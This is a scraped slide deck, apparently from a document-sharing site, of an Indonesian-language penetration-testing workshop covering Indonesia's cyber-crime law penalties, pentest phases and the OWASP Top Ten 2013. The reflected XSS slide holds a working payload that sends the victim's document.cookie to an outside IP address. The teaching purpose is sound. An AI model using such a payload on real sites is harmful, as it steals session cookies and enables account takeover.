workshop 101 - penetration testing & vulnerability assessment

Post on 04-Jun-2015

342 Views

Category:

Technology

6 Downloads

Preview:

Click to see full reader

DESCRIPTION

- Penetration testing and Vulnerability assessment system using OpenVas. - Privilege escalation - Pivoting server - metasploit

TRANSCRIPT

Workshop 101Penetration testing & Vulnerability assessment

danang@hatsecure.com

Hat Secure | Workshop 101

Penetration testing

Hat Secure | Workshop 101

Penetration testing

– Wewenang sah– Pengendalian kerusakan– Tanggung jawab– Lingkup kerja– Masalah privasi– Tugas untuk memperingatkan

Hat Secure | Workshop 101

UU ITE

Hat Secure | Workshop 101

Pasal 30

• Sengaja mengakses komputer atau sistem elektronik tanpa ijin.

• Pidana 6 - 8 tahun• Denda 600jt - 800jt

Hat Secure | Workshop 101

Pasal 32

• Sengaja dan tanpa ijin melakukan pemindahan, perusakan dan membuka informasi rahasia.

• Pidana 8 - 10 tahun penjara• Denda 2M - 5M

Hat Secure | Workshop 101

Pasal 33

• Sengaja dan tanpa ijin melakukan tindakan apapun yang mengakibatkan sistem terganggu.

• Pidana 10 tahun• Denda 10M

Hat Secure | Workshop 101

Pasal 35

• Sengaja dan tanpa ijin melakukan pemalsuan Dokumen elektronik agar seolah-olah data yang otentik.

• Pidana 12 tahun penjara • Denda 12 M

Hat Secure | Workshop 101

Hat Secure | Workshop 101

Penetration testing

• Scope• Information gathering• Target identification• Target enumeration• Vulnerability mapping

Hat Secure | Workshop 101

Penetration testing

• Exploitation• Post Exploitation• Social Engineering

Hat Secure | Workshop 101

The Open Web Application Security Project (OWASP)

• Komunitas terbuka yang didedikasikan untuk mengembangkan dan memelihara aplikasi yang dapat dipercaya.

• Misi OWASP adalah untuk membuat perangkat lunak keamanan.

• Lisensi Free Open Source.

Hat Secure | Workshop 101

OWASP Top Ten

2013

A1 Injection

A2 Broken Authentication and Session Management

A3 Cross-Site Scripting (XSS)

A4 Insecure Direct Object References

A5 Security Misconfiguration

A6 Sensitive Data Exposure

A7 Missing Function Level Access Control

A8 Cross-Site Request Forgery (CSRF)

A9 Using Known Vulnerable Components

A10 Unvalidated Redirects and Forwards

Hat Secure | Workshop 101

A1 - Injection

• Kelemahan injeksi terjadi ketika data yang tidak dipercaya dikirim ke interpreter sebagai bagian dari suatu perintah atau query.

• Serangan yang populer :– Database Injection– LDAP injection– OS command injection

Hat Secure | Workshop 101

A2 - Broken Authentification and Session Management

• Aplikasi yang berhubungan dengan otentikasi dan manajemen sesi sering tidak diterapkan dengan benar.

Hat Secure | Workshop 101

SESSION FIXATION

Hat Secure | Workshop 101

A3 - Cross Site Scripting

• Kelemahan XSS terjadi ketika aplikasi mengambil data yang tidak dipercaya dan mengirimkannya ke browser web tanpa validasi yang tepat atau meloloskannya.

• Dibagi menjadi beberapa kategori, yang populer :– XSS Reflected– XSS Stored

Hat Secure | Workshop 101

XSS Reflected

<script>var tmp = document.cookie; document.write('<img src="http://192.168.0.103/?'%2btmp%2b'"/>');</script>

Hat Secure | Workshop 101

A4 - Insecure Direct Object Reference

• Pengembang mengekspos referensi ke sebuah obyek implementasi internal, seperti file, direktori, rekaman database, atau kunci, melalui URL atau bentuk parameter.

• Populer :– Relative Path Disclosure– Full Path Disclosure

Hat Secure | Workshop 101

Full Path Disclosure

Hat Secure | Workshop 101

A5 - Security Misconfiguration

• Celah ini muncul akibat dari kesalahan konfigurasi keamanan.

• Populer :– PHPMyadmin (tanpa password)– Firewall = Off– dan sebagainya

Hat Secure | Workshop 101

A6 - Sensitif Data Exposure

• Banyak aplikasi web tidak melindungi data sensitif– kartu kredit– ID pajak– otentifikasi yang tidak benar.

Hat Secure | Workshop 101

A7 - Missing Functional Access Control

• Sebagian besar aplikasi web memverifikasi tingkat hak akses sebelum user interface terlihat.

• Kesalahan dari pengembang menyebabkan halaman web dapat diakses tanpa memiliki hak akses.

Hat Secure | Workshop 101

A8 - Cross Site Request Forgery

• Celah keamanan pada aplikasi web dengan cara mengeksploitasi suatu task dari sebuah Web dengan memanfaatkan Autentikasi yang dimiliki oleh target.

Hat Secure | Workshop 101

A9 - Using Components with Known Vulnerabilities

• Komponen, seperti library, framework, dan modul perangkat lunak lain, hampir selalu berjalan dengan hak penuh.

• Jika komponen yang memiliki celah ini dimanfaatkan, serangan seperti itu dapat menyebabkan kehilangan data yang serius hingga server yang anda miliki diambil alih.

Hat Secure | Workshop 101

A10 - Unvalidated Redirects and Forwards

• Meneruskan pengguna ke halaman web lain tetapi tanpa konfirmasi.

• Tanpa konfirmasi, user tidak sadar jika posisi terkini ada di web lain.

Hat Secure | Workshop 101

Pentest Labs

top related